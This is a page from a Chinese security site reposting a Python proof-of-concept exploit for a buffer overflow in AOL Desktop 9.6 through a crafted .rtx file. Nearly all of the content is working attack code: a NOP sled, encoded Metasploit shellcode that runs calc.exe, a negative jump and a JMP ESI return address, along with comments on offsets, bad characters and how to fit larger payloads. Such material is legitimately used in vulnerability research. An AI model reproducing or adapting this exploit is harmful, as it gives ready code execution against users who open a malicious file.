首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AOL Desktop 9.6 .rtx Buffer Overflow
来源:vfocus.net 作者:sickness 发布时间:2011-02-10  

#!/usr/bin/python
# Vulnerable app: AOL Desktop 9.6
# Author: sickness
# Download : http://daol.aol.com/software/aoldesktop96/
# kudos to sup3r: http://www.exploit-db.com/exploits/16085/
# Tested : Windows XP Professional SP3 (EN) latest updates
# DATE   : 02/02/2011
# NOTE: If exploit doesn't work turn AOL off (CTRL+ALT+DELETE and turn all AOL processes off) then try again
# DO NOT FORGET TO FEEL THE PWNSAUCE WITH: http://redmine.corelan.be:8800/projects/pvefindaddr
###################################################################
# You might need to change the offset.
# If you want a payload larger than 400 bytes, then you need to increase the negative jump
# Watch out for other bad chars !!
# Current bad chars: \x00\x0a\x0d\x20\x31\x90\x3e
###################################################################


# First Header
hd1 = ("\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a"
"\x45\x3d\x32\x20\x50\x54\x53\x49\x5a\x45\x3d\x31\x30\x20\x46\x41"
"\x4d\x49\x4c\x59\x3d\x22\x53\x41\x4e\x53\x53\x45\x52\x49\x46\x22"
"\x20\x46\x41\x43\x45\x3d\x22\x41\x72\x69\x61\x6c\x22\x20\x4c\x41"
"\x4e\x47\x3d\x22\x30\x22\x3e\x3c\x41\x20\x48\x52\x45\x46\x3d\x22"
"\x68\x74\x74\x70\x3a\x2f\x2f")

# Second Header
hd2 = ("\x22\x3e\x74\x65\x73\x74\x3c\x2f\x41\x3e\x3c\x55\x3e\x3c\x42\x52"
"\x3e\x0d\x0a\x3c\x2f\x55\x3e\x3c\x2f\x46\x4f\x4e\x54\x3e\x3c\x2f"
"\x48\x54\x4d\x4c\x3e\x0d\x0a")
 
payload='\x90'* 4968 # 5368 until EIP overwrite - 400 bytes from the negative jump.
payload += '\x90'*16 # Some nops

# msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b '\x00\x0a\x0d\x20\x31\x90\x3e' -t c

payload +=("\x33\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x17\x22\xfd\x6a\x83\xee\xfc\xe2\xf4\xeb\xca\x74\x6a\x17\x22"
"\x9d\xe3\xf2\x13\x2f\x0e\x9c\x70\xcd\xe1\x45\x2e\x76\x38\x03"
"\xa9\x8f\x42\x18\x95\xb7\x4c\x26\xdd\xcc\xaa\xbb\x1e\x9c\x16"
"\x15\x0e\xdd\xab\xd8\x2f\xfc\xad\xf5\xd2\xaf\x3d\x9c\x70\xed"
"\xe1\x55\x1e\xfc\xba\x9c\x62\x85\xef\xd7\x56\xb7\x6b\xc7\x72"
"\x76\x22\x0f\xa9\xa5\x4a\x16\xf1\x1e\x56\x5e\xa9\xc9\xe1\x16"
"\xf4\xcc\x95\x26\xe2\x51\xab\xd8\x2f\xfc\xad\x2f\xc2\x88\x9e"
"\x14\x5f\x05\x51\x6a\x06\x88\x88\x4f\xa9\xa5\x4e\x16\xf1\x9b"
"\xe1\x1b\x69\x76\x32\x0b\x23\x2e\xe1\x13\xa9\xfc\xba\x9e\x66"
"\xd9\x4e\x4c\x79\x9c\x33\x4d\x73\x02\x8a\x4f\x7d\xa7\xe1\x05"
"\xc9\x7b\x37\x7d\x23\x70\xef\xae\x22\xfd\x6a\x47\x4a\xcc\xe1"
"\x78\xa5\x02\xbf\xac\xd2\x48\xc8\x41\x4a\x5b\xff\xaa\xbf\x02"
"\xbf\x2b\x24\x81\x60\x97\xd9\x1d\x1f\x12\x99\xba\x79\x65\x4d"
"\x97\x6a\x44\xdd\x28\x09\x76\x4e\x9e\x44\x72\x5a\x98\x6a")
payload += '\x90'*(5368-len(payload))
payload += '\xe9\x70\xfe\xff\xff' # Jump back 400 bytes
payload += '\x90'*11
payload += '\xC0\xCF\xC5\x20'  # Universal JMP ESI from [aolusershell.dll]
payload += '\x90'*(6000-len(payload))

exploit = hd1+payload+hd2
 
try:
   file=open('exploit.rtx','w')
   file.write(exploit)
   file.close()
   print 'File created, time to PEW PEW!\n'
except:
   print 'Something went wrong!\n'
   print 'Check if you have permisions to write in that folder, of if the folder exists!'


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·QuickShare File Share 1.2.1 Di
·FreeBSD <= 5.4-RELEASE ftpd (V
·FTPGetter v3.58.0.21 Buffer Ov
·Hanso Player 1.4.0.0 Buffer Ov
·Android 1.x/2.x Local Root Exp
·Hanso Converter v1.1.0 BufferO
·Android 1.x/2.x HTC Wildfire L
·ProFTPD mod_sftp Integer Overf
·Terminal Server Client .rdp De
·AoA DVD Creator V2.5 ActiveX S
·CodeBlocks v8.02 (cbp) Buffer
·AoA Mp4 converter v4.1.0 Activ
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved